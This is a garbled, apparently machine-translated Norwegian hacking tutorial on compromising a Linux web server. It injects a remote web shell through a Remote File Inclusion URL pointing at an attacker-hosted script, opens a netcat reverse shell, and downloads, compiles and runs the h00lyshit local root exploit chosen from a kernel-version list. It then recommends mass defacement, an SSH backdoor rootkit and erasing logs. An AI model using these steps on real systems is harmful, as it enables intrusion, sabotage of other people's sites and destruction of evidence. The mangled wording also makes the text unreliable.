...:: [BABY CORP]:: ...

Du trenger:
Quote:
- Sårbare Nettsted i RFI
- Ryggskjoldet for RFI (f.eks c99, r57 eller annet)
- Netcat
- Lokale Root Exploit (avhengig av kjernen og versjon)

Dette målet opplæringen er å tråd en faktisk akseptert konto i aksjon for forankring i Linux Server med Trygg Mod: OFF.Suppose at vi godtar starte en nettside med RFI sårbarhet:

Kode:

http://www.hackedsite.com/folder/index.html?page =

e kan kjøre skall utnytte Remote File inkluderingsdepartementet, som følger:

Kode:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

der evilscript.txt er vår web ryggskjoldet at vi godtar allerede lastet opp til nettstedet vårt. (Www.mysite.com i mappen: skall)

Etter at vi opptak med skall, opprinnelig av alt vil vi se tilpasningen av atomet øverst på siden eller ved å skrive: uname - en i kommandolinje.

Å overholde vi aksepterer å feste med backconnection til boksen. Dette kan gjøres med to betyr at hvis vi godtar det akseptable skallet.

Vi kan bruke Tilbake-Connect bar av r57/c99 panser eller for å laste opp en backconnector i en skrivbar mappe

I mange av skjell er det en backconnection hengivenhet etter å laste opp Fastgjør Tilbake ryggskjoldet (eller tillegg en ryggskjoldet i Perl / c). Vi vil analysen de innfødte måte som er aksial den ryggskjoldet (i vår arketypen på ryggskjoldet er r57).

Det kan vi tilgjengelige netcat og avtalen til å akseptere i et bestemt Anchorage (dette forankring aksepterer å være nøyaktig åpnet / videresendt i NAT / Firewall hvis vi godtar en ruter) med det etterpå måten:

Vi vil skrive: 11457 i ankerplassen tilskrive (Dette er fraværet ankerplass for utholde versjonene av r57 shell). Vi kan bruke og lagt til port.

Vi trykker i Windows Start -> Kjør -> og vi skriv: cmd

Etter at vi skal gå til netcat katalogen:

Quote:

cd C: \ Programfiler \ netcat
Og vi skriver du inn følgende kommando:
Quote:
nc-n-l-v-p 11456
Netcat svarer: lytter på [noen] 11 456 ...

I den aksiale siden av r57 ryggskjoldet vi erverv under etterpå menyen::: Net:: og tilbake-tilkobling. I IP Anatomy vil vi blazon våre IP (www.cmyip.com å se vår ip hvis vi godtar dynamisk)

I Anchorage anatomien vil vi sette ankerplassen som vi åpnet og netcat lytter.

Hvis vi spaltist påføre ryggskjoldet vil svare:

Nå Programvare prøver påføre til Anchorage 11 456 ...

Hvis våre innstillinger er faktiske netcat vil avtalen oss en ryggskjoldet til serveren

Nå kommer vi følge til Utryddelsen prosessen.

Vi aksepterer å kjøp en skrivbar bindemiddel i justering for å laste ned og forkorte den grensar Grunnlag Gjennomføring som samsvarer oss grunnlag privilegier i boksen. Avhengig av tilpasningen av Linux-atomet er det forandret utnytter. Noen ganger bedrift avbryte for å kjøre fordi enkelte bokser er lappet eller vi ikke aksepterer den faktiske permissions.List av bedriftene / kernel:

Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> BRK, brk2, newlocal, kmod
2.4.19 -> BRK, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, BRK, brk2
2.4.21 -> BRK, brk2, ptrace, ptrace-kmod
2.4.22 -> BRK, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> Raptor, raptor2, h0llyshit, prctl
2.6.14 -> Raptor, raptor2, h0llyshit, prctl
2.6.15 -> Raptor, raptor2, h0llyshit, prctl
2.6.16 -> Raptor, raptor2, h0llyshit, prctl

Vi får se når det gjelder 2.6.8 Linux-kjernen. Vi vil belaste h00lyshit utnytte.

Noen områder som vi kan oppkjøpet grensar Basis Exploits:

milw0rm (Prøv Søk: "linux kernel")

Andre steder: www.packetstormsecurity.org | www.milw0rm.com eller prøve googlin "kan du finne 'em all

Vi kan oppkjøpet skrivbare mapper / filer ved å skrive:
Kode:

finne /-perm -2-ls

Vi kan bruke / tmp bindemiddel som er en akseptert skrivbar mappe

Vi skriver:
Kode:

cd / tmp

For å laste ned avgrensa grunnlaget gjennomføringen vi kan bruke en nedlasting kommando for linux som wget.

For eksempel:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
der http://www.yoursite.com/localroot/h00lyshit.c er url til h00lyshit.

Etter nedlastingen vi godtar å forkorte gjennomføringen (Les lærling for gjennomføringen afore til kompilere)

For h00lyshit vi godtar å skrive:
Kode:

gcc h00lyshit.c-o h00lyshit

Nå er vi godtar opprettet den kjørbare filen: h00lyshit.

Kommandoen for å kjøre denne gjennomføringen er:
Kode:

./h00lyshit

Vi belaster en faktisk stor bok på djen i justeringen å løpe auspiciously og for å få root.

Vi aksepterer å aktualisere en stor bok i / tmp eller i tillegg skrivbar mappe.

Kommandoen er:
Kode:

dd if = / dev / urandom av = Largefile teller = 2M

der Largefile er filnavnet.

Vi aksepterer å vente 2-3 minutter for boken etablering

Hvis denne kommandoen mislykkes vi kan forsøke:
Kode:

dd if = / dev / null av = / tmp / Largefile teller = 102400 bs = 1024

Nå kan vi procced til tåle trinn. Vi kan kjøre gjennomføringen ved å skrive:
Kode:

./h00lyshit Largefile eller

./h00lyshit / tmp / Largefile

(Hvis vi er i en forandret skrivbar bindemiddel og Largefile skapes i / tmp)

Hvis det ikke er aktive feil (kanskje det atomet er lappet eller er noe galt med gjennomføring løpe eller stort arkiv) vil vi få root

Til analyse om vi fikk root:

id eller

whoami

Hvis det står at grunnlaget vi fikk rot!

Nå kan vi utviske / masse lyte alle nettstedene på serveren eller byråkratiet et rootkit (f.eks SSHDoor) og å gi ssh / telnet ryggskjoldet opptak til serveren.

Vi aksepterer å avskaffe alle logger i justeringen for å være trygg med en logg renere. En akseptabel renere for denne jobben er MIG Logg Cleaner.

Popularitet: 61% [ ? ]